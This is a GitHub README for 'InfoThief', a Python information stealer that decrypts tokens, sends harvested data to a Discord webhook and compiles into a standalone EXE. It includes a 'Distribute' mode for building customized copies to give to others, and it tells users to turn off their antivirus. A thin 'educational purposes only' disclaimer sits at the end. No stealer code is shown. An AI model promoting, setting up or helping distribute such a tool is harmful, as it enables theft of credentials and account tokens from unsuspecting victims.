Welcome to InfoThief! This tool enables gathering and analyzing information from multiple platforms in one place. Itโs designed for intelligence enthusiasts and security analysts to aggregate information for research and analysis purposes.
- Multi-Platform Information Extraction: Collect information across multiple applications and platforms.
- Token Decryption: Decrypts encrypted tokens for further use and analysis.
- Custom Webhook Notifications: Send data insights to a Discord channel through webhooks.
- Compiles to EXE: Generate standalone executable scripts.
- Interactive ASCII Header: Stylish ASCII art and interactive user interface.
- Advanced Error Handling: Comprehensive error catching for robust execution.
- Python 3.x installed on your system.
- PyInstaller (for compiling scripts into EXE format).
- Colorama, pyfiglet, requests, and other dependencies (listed in
requirements.txt
). - Disable antivirus turn off your antivirus.
Installation (๐ก๏ธ If you have not turned your antivirus off it will not work make sure to disable it. ๐ก๏ธ)
-
Clone the repository:
git clone https://github.com/BigglesDevs/InfoThief.git cd InfoThief
-
Create and Activate a Virtual Environment (venv): It is recommended to create a virtual environment to keep your project dependencies isolated. Follow these steps:
python -m venv venv # Create a virtual environment named 'venv' source venv/bin/activate # Activate on macOS/Linux .\venv\Scripts\activate # Activate on Windows
Once activated, your terminal prompt will show
(venv)
to indicate that the virtual environment is active. -
Install dependencies:
pip install -r requirements.txt
To launch InfoThief, use the following command:
python InfoThief.py
-
Test InfoThief (On Self):
- Gathers information from your own system and sends the data to a specified Discord webhook.
-
Create InfoThief (Distribute):
- Allows you to create and distribute a personalized version of the script.
- Customize the script with your webhook URL and optionally compile it into an executable.
-
Exit:
- Exits the script.
This tool is intended for educational and research purposes only. Unauthorized use of this tool against systems, devices, or accounts without permission is illegal and unethical. The creators and contributors are not responsible for any misuse or damage caused by the use of this tool.
The creator of this project, BigglesDevelopment, is not involved in or responsible for any actions or data gathered using this tool. Any information sent or gathred using the tool is strictly the responsibility of the user. This was made for educational purpose only!
We welcome contributions! Feel free to fork this repository and submit a pull request. If you have any questions or need assistance, open an issue in the repository.
This project is licensed under the MIT License - see the LICENSE file for details.
InfoThief: Made by BigglesDevelopmentโค๏ธ.
Keep learning, stay secure! ๐